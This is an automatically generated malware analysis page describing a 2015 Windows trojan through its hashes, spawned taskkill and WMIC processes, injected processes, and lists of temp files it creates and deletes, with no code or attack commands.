Trojan.Generic.14779156_71cc6609b8

by malwarelabrobot on August 29th, 2015 in Malware Descriptions.

Trojan.Generic.14779156 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 71cc6609b8db5735ef1d0cf991f0ee49
SHA1: 6abe7b6d599d0ef84c7225808129b166b64efa7a
SHA256: 393c69d06b1edf1fd89dfc4eda3cf7ac22fff35d015a64c10de58b36ca5023a2
SSDeep: 24576:g8pVgU6qc00PhieAdO7gejjdYKmui3Omj:rVgUo00PQlMHdYvR
Size: 816064 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

WMIC.exe:3044
vchk.exe:456
taskkill.exe:2712
taskkill.exe:3924
taskkill.exe:3712
taskkill.exe:1612
taskkill.exe:760
taskkill.exe:3288
taskkill.exe:2968
taskkill.exe:2524
taskkill.exe:1948
taskkill.exe:2520
taskkill.exe:2324
taskkill.exe:1940
taskkill.exe:2328
taskkill.exe:2248
taskkill.exe:2400
taskkill.exe:2292
taskkill.exe:3996
taskkill.exe:2844
taskkill.exe:2408
taskkill.exe:3760
taskkill.exe:3488
taskkill.exe:3836
taskkill.exe:3764
taskkill.exe:2708
taskkill.exe:3832
taskkill.exe:2852
taskkill.exe:1152
taskkill.exe:3400
taskkill.exe:1496
taskkill.exe:264
taskkill.exe:3408
taskkill.exe:3644
taskkill.exe:2996
taskkill.exe:3244
taskkill.exe:4080
taskkill.exe:2412
taskkill.exe:3844
taskkill.exe:412
taskkill.exe:2792
taskkill.exe:2148
taskkill.exe:3948
taskkill.exe:2476
taskkill.exe:1324
taskkill.exe:3820
taskkill.exe:3276
taskkill.exe:1924
taskkill.exe:3308
taskkill.exe:2600
taskkill.exe:3208
taskkill.exe:3676
taskkill.exe:4044
taskkill.exe:2308
taskkill.exe:4040
taskkill.exe:2780
taskkill.exe:1852
taskkill.exe:2304
taskkill.exe:3388
taskkill.exe:3008
taskkill.exe:2380
taskkill.exe:2664
taskkill.exe:2660
taskkill.exe:1652
taskkill.exe:2260
taskkill.exe:3744
taskkill.exe:2200
taskkill.exe:3584
taskkill.exe:3556
taskkill.exe:2280
taskkill.exe:2448
taskkill.exe:304
taskkill.exe:3508
taskkill.exe:4056
taskkill.exe:2044
taskkill.exe:2576
taskkill.exe:3468
taskkill.exe:2376
taskkill.exe:432
taskkill.exe:2484
taskkill.exe:2616
taskkill.exe:2596
taskkill.exe:2920
taskkill.exe:336
taskkill.exe:1228
taskkill.exe:2192
taskkill.exe:3000
taskkill.exe:3168
taskkill.exe:172
taskkill.exe:3452
taskkill.exe:484
taskkill.exe:2056
taskkill.exe:2564
taskkill.exe:3012
taskkill.exe:2368
taskkill.exe:3892
taskkill.exe:2680
taskkill.exe:3080
taskkill.exe:2116
taskkill.exe:3600
taskkill.exe:2812
taskkill.exe:3876
taskkill.exe:3524
taskkill.exe:3076
taskkill.exe:2184
taskkill.exe:220
taskkill.exe:2216
taskkill.exe:3200
taskkill.exe:2896
taskkill.exe:2892
taskkill.exe:3500
taskkill.exe:3964
taskkill.exe:2108
taskkill.exe:2692
taskkill.exe:2104
taskkill.exe:2860
taskkill.exe:3868
taskkill.exe:3900
taskkill.exe:3636
taskkill.exe:2636
taskkill.exe:3632
taskkill.exe:2436
taskkill.exe:3060
taskkill.exe:236
taskkill.exe:4008
taskkill.exe:2340
taskkill.exe:1616
taskkill.exe:3432
taskkill.exe:4004
taskkill.exe:3928
taskkill.exe:2744
taskkill.exe:1560
taskkill.exe:2748
taskkill.exe:2504
taskkill.exe:1564
taskkill.exe:3624
taskkill.exe:2728
taskkill.exe:3356
taskkill.exe:3932
taskkill.exe:3228
taskkill.exe:2336
taskkill.exe:3116
taskkill.exe:3788
taskkill.exe:3548
taskkill.exe:2084
taskkill.exe:2224
taskkill.exe:1764
%original file name%.exe:348

The Trojan injects its code into the following process(es):

winonit.exe:892
EG9650tGGrxO3Ey:1932
getcap.exe:1236
wincheckfe.exe:1676
wcheckf.exe:660
vchk.exe:232
internetport3.exe:1088

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process winonit.exe:892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\a\avv.txt (2432 bytes)
C:\a\ahho.txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\hho[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\uur[1].htm (2 bytes)
C:\a\auur.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\vv[1].htm (2432 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp (0 bytes)
C:\a\vv.txt (0 bytes)
C:\a\uur.txt (0 bytes)
C:\a\hho.txt (0 bytes)

The process EG9650tGGrxO3Ey:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\localhost[1].htm (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\EG9650tGGrxO3Eyr78zW.html (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\inetc.dll (20 bytes)
C:\a\1loogg2.txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apEG9650tGGrxO3Eyr78zW.html (324 bytes)
C:\a\1logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\ckkk[1].htm (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\ns29.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\ckkkp[1].htm (324 bytes)
C:\a\vv11111.txt (26514 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aEG9650tGGrxO3Eyr78zW.html (303 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp (0 bytes)
C:\a\ProcessList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apEG9650tGGrxO3Eyr78zW.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\EG9650tGGrxO3Eyr78zW.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\ns29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (0 bytes)
C:\a\vv11111.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aEG9650tGGrxO3Eyr78zW.html (0 bytes)

The process getcap.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\a\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswE.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nswD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswE.tmp (0 bytes)

The process WMIC.exe:3044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
C:\a\ProcessList.txt (1888 bytes)

The Trojan deletes the following file(s):

C:\a\ProcessList.txt (0 bytes)

The process wincheckfe.exe:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse6.tmp\FindProcDLL.dll (3 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse6.tmp (0 bytes)

The process wcheckf.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\vchk[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\inetc.dll (20 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp (0 bytes)

The process vchk.exe:232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB6.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns74.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns95.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns40.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA2.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAF.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns34.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns21.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA1.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns78.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns54.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns51.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns91.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns46.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns67.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns82.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns88.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns35.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns58.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns76.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns38.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns33.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns60.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns52.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB1.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns75.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA0.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns26.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA9.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns43.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns99.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB0.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns31.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns20.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAD.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns66.tmp (6 bytes)
C:\a\avchk.txt (1885 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns36.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns41.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns32.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns96.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns93.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns49.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns28.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA6.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns84.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns86.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns50.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns68.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns97.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns81.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns59.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns53.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns45.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns25.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns48.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns15.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns85.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns42.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns98.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns70.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns39.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns73.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAE.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns30.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns18.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns27.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns79.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns37.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns69.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns71.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns94.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns63.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns44.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns23.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\vchk[1].htm (1885 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns87.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns47.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns12.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB2.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns24.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns90.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns62.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns92.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns72.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns56.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns77.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns65.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns55.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns80.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns89.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns57.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns61.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns64.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns22.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4B.tmp (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns74.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns95.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns78.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns83.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns54.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns51.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns91.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns46.tmp (0 bytes)
C:\a\vchk.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns67.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns88.tmp (0 bytes)
